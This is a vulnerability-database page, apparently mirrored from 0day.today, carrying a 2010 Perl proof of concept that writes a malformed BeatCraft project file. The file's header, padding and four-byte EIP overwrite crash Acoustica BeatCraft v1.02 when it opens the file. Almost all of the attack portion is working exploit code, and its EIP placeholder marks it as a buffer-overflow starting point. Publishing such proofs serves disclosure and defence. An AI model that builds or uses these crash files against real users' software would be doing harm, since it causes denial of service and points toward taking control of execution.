Lucene search
K

Acoustica BeatCraft v1.02 Build 19 Local DoS Crash PoC

🗓️ 14 Oct 2010 00:00:00Reported by secuid0Type 
zdt
 zdt
🔗 0day.today👁 16 Views

Acoustica BeatCraft v1.02 Build 19 Local DoS Crash Po

Code
======================================================
Acoustica BeatCraft v1.02 Build 19 Local DoS Crash PoC
======================================================

#Download: http://www.acoustica.com/beatcraft/download.htm
#Tested on Windows XP Pro SP2 (050301-1519)
#Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
#Greetz: inj3ct0r and offsec teams
#!/usr/bin/perl

my $header = "\x52\x49\x46\x46\x30\x79\x02\x00\x62\x65\x61\x74".
  			 "\x62\x70\x72\x6f\x30\x02\x00\x00\xcd\xcc\x8c\x3f".
  			 "\x43\x3a\x5c\x41\x2e\x62\x63\x70\x72\x6f\x6a";

my $junk ="\x50"x499;
my $eip ="\x41"x4;
my $junk2="\x59"x42;

open (myfile, '>crashpoc.bcproj');
binmode(myfile);
print myfile $header.$junk.$eip.$junk2;
close (myfile);
print "\t\t\tCrash file has been created - crashpoc.bcproj\n";



#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Oct 2010 00:00Current
7High risk
Vulners AI Score7
16